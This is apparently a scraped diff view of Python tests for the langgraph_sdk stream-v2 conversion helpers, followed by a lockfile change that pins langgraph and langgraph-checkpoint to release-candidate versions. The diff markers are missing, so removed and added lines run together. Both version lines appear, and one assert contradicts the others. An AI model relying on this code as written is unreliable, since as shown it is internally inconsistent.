with httpx.Client(transport=transport, base_url="https://example.com") as client:
http_client = SyncHttpClient(client)
parts = list(http_client.stream("/stream", "GET"))
parts: list[StreamPartV2] = [part async for part in _wrap_stream_v2(mock_stream())]
assert len(parts) == 3
for part in parts:
_assert_v2_shape(part)
assert parts[0] == {"type": "metadata", "ns": [], "data": {"run_id": "r1"}}
assert parts[1] == {
"type": "values",
"ns": [],
"data": {"messages": [{"role": "user", "content": "hi"}]},
}
assert parts[2] == {
"type": "updates",
"ns": ["sub:abc"],
"data": {"node": {"out": 1}},
}
assert parts == [StreamPart(event="foo", data={"bar": 1})]
def test_sync_stream_v2_client_side_conversion() -> None:
from langgraph_sdk._sync.runs import _wrap_stream_v2_sync
def mock_stream() -> Any:
yield StreamPart(event="metadata", data={"run_id": "r1"})
yield StreamPart(event="values", data={"state": "full"})
yield StreamPart(event="end", data=None) # type: ignore[arg-type]
parts: list[StreamPartV2] = list(_wrap_stream_v2_sync(mock_stream()))
assert len(parts) == 2
for part in parts:
_assert_v2_shape(part)
assert parts[0] == {"type": "metadata", "ns": [], "data": {"run_id": "r1"}}
assert parts[1] == {"type": "values", "ns": [], "data": {"state": "full"}}
# --- type narrowing compile-time checks ---
def _check_v2_type_narrowing(part: StreamPartV2) -> None:
"""Compile-time type narrowing checks — validates mypy narrows the union."""
if part["type"] == "values":
assert_type(part, ValuesStreamPart)
assert_type(part["data"], dict[str, Any])
elif part["type"] == "updates":
assert_type(part, UpdatesStreamPart)
assert_type(part["data"], dict[str, Any])
elif part["type"] == "custom":
assert_type(part, CustomStreamPart)
elif part["type"] == "checkpoints":
assert_type(part, CheckpointsStreamPart)
assert_type(part["data"], CheckpointPayload)
elif part["type"] == "tasks":
assert_type(part, TasksStreamPart)
assert_type(part["data"], TaskPayload | TaskResultPayload)
elif part["type"] == "debug":
assert_type(part, DebugStreamPart)
assert_type(part["data"], DebugPayload)
elif part["type"] == "metadata":
assert_type(part, MetadataStreamPart)
assert_type(part["data"], RunMetadataPayload)
+2 -2
View File
@@ -265,7 +265,7 @@ wheels = [
[[package]]
name = "langgraph"
version = "1.0.10"
version = "1.0.10rc1"
source = { editable = "../langgraph" }
dependencies = [
{ name = "langchain-core" },
@@ -349,7 +349,7 @@ test = [
[[package]]
name = "langgraph-checkpoint"
version = "4.0.1"
version = "4.0.1rc4"
source = { editable = "../checkpoint" }
dependencies = [
{ name = "langchain-core" },